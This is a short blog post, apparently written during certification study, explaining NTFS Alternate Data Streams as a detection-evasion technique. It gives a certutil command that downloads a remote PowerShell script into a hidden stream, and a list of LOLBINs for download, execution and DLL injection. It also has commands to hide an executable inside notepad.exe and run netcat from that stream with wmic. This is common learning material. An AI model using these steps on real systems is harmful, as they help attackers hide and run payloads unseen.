What is Alternate Data Stream?
In NTFS, Alternate Data Stream is essentially a file, information behind another file or folder. It’s usually accessible via the colon mark :. If you remember back to those Windows Media days, when you play a song, and you used to see the song title, author’s data, year…etc. That was an ADS. Same with fav icons in Internet Shortcut files, or thumbnails, etc…
Without going too much into the forensics behind NTFS file system, every file have at least one stream know as $DATA. Starting with Windows 7+, the concept of Zone.Identifier stream was introduced. What this does it that it mark where the file came from (for example, trusted internal, from the internet…etc).
As I’m studying for my cert soon, this topic came up and it reminded me of all the fun stuffs you can do. I initially learned this a few years ago but didn’t utilize it and just kind of forgot about it. However, it has recently popped up a lot in the classes I’ve been taking, and it’s still a great technique to use to bypass some detection, and if you’re creative… there are a TONS of fun things you can utilize ADS for!
Attack vectors
You can get pretty creative with whatever. Think about Powershell script, python script, whatever payload script…
Following up on my last topic about LOLBAS stuffs, this is an example utilizing certutil to download a file, and then saving it as an Alternate data stream:
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/tnvo/demo/master/ads.ps1 c:\temp:ttt^ Notice the : used?
Extra, extra fun?
So if you’re wanting to have some extra, extra fun, you can incorporate some Windows LOLBINS such as:
- Mshta.exe - HTA files, VBA, Script
- Csc.exe - C#
- Certutil.exe - Download, decoding hex
- Bitsadmin.exe - Download, execute file
- Cs - Install ADS serveries
- Extract.exe / Extrac32.exe
- Esentutl.exe
- Expand.exe
- Forfiles.exe / Findfiles.exe
- Makecab.exe
- Reg.exe / RegEdit.exe
Injecting Dlls:
- Mavinject.exe
- Control.exe
- Rundll32
More examples
Create your own text file hidden into another text file:
notepad C:\tmp\test.txt
notepad C:\tmp\test.txt:hideme.txtEmbed an exe into another exe (or txt, it’s really up to you!)
type hackstuffs.exe > notepad.exe:stream1.exe
cp hacktuffs.exe notepad.exe:stream1.exeThen to execute it:
Get data back, it can be copied out of stream:
cp notepad.exe:stream1.exe hackstuff.exeCreate an alternate data stream attached to a directory by simply typing:
notepad <file/dir name>:<stream-name>To see/view:
dir /r <file path>Example:
dir /r /C:\tmp
Get-Item .\file -Stream *- Or use Streams.exe from SysInternals
If you know a stream exists and you know its name, view its content using more:
more < c:\file:stream1
wmic process call create <whole PATH to file>
To run:
wmic process call create C:\Users\T\Downloads\notepad.exe:nc.exe
Get nc out:
more < C:\Users\T\Downloads\notepad.exe:nc.exe > nc.exeThat’s it for today!
Sources / Resources:
- SANS 504 Class
- Sean Pierce’s ADS Presentation
- https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
- https://www.owasp.org/index.php/Windows_::DATA_alternate_data_stream